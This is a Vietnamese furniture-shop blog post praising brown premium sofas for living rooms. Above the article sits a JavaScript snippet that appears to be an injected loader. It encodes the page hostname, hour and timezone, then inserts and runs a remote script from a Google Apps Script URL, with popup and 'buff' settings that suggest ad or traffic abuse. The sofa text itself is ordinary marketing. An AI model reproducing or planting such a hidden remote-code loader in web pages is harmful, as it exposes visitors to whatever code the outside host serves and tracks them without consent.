var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Những lí do nên mua sofa cao cấp màu nâu cho phòng khách

Những bộ sofa cao cấp màu nâu luôn là chọn lựa của nhiều gia chủ cho phòng khách gia đình. Sofa màu nâu đa dạng mẫu mã với nhiều các ý nghĩa khác nhau.

Hãy cùng Nội Thất Xinh tìm hiểu lí do tại sao nên chọn lựa ghế sofa màu nâu cho phòng khách nhé.

Sofa cao cấp màu nâu tạo sự đẳng cấp, sang trọng

Hầu hết gia chủ nào cũng muốn có được phòng khách sang trọng, đẳng cấp. Muốn có được điều đó chọn lựa sofa rất quan trọng. Bạn có thể chọn lựa sofa nhập khẩu hoặc sofa trong nước với các gam màu khác nhau. Màu nâu sẽ là gợi ý hoàn hảo để có được một không gian như thế.

sofa cao cấp màu nâu
Không gian bài trí ghế sofa màu nâu luôn tạo được sự sang trọng và đẳng cấp

Sofa màu nâu luôn tạo được sự sang trọng nhất và thời thượng nhất cho phòng khách của bạn. Đây là gam màu trầm ấm và không bao giờ bị lỗi mốt. Bạn có thể chọn lựa sofa nâu da bò, sofa màu nâu đất, sofa màu nâu cafe… tùy theo sở thích của mình.

Sofa cao cấp màu nâu hài hòa cho không gian

Màu nâu của sofa phòng khách sẽ luôn giúp không gian của bạn trở nên hài hòa và cân đối. Gam màu này dễ dàng kết hợp được với nhiều các gam màu sắc khác nhau. Nó có thể kết hợp với các màu nhẹ nhàng, trung tính cho đến màu nổi bật. Màu nâu tạo sự cân bằng và giúp cho phòng khách trở nên đẹp hơn, ấn tượng hơn và mạnh mẽ hơn.

sofa cao cấp màu nâu
Màu nâu sofa dễ hợp với các gam màu khác, tạo sự hài hòa cho không gian


Sofa cao cấp màu nâu sạch sẽ, dễ vệ sinh

Dù là sofa vải hay sofa da với gam màu nâu cũng đều tạo nên được cảm giác sạch sẽ. Khi sofa bị bẩn cũng sẽ không để lộ dấu vết, vệ sinh cũng cực kì dễ dàng. Đây cũng là một trong những ưu điểm của ghế sofa màu nâu được nhiều người chọn lựa. Màu nâu của sofa luôn giữ được vẻ đẹp bền bỉ với thời gian.

sofa cao cấp màu nâu
Màu nâu của ghế sofa luôn tạo được sự sạch sẽ, dễ chịu


Sofa cao cấp màu nâu
với rất nhiều các mẫu mã khác nhau trên thị trường. Bạn có thể chọn lựa sofa da, sofa vải hay sofa gỗ. Từng loại sofa lại có các chất liệu khác nhau, giá cả khác nhau.

Sofa màu nâu có nhiều mẫu đẹp, giá phù hợp và chất lượng cao cấp ngay tại siêu thị Nội Thất Xinh.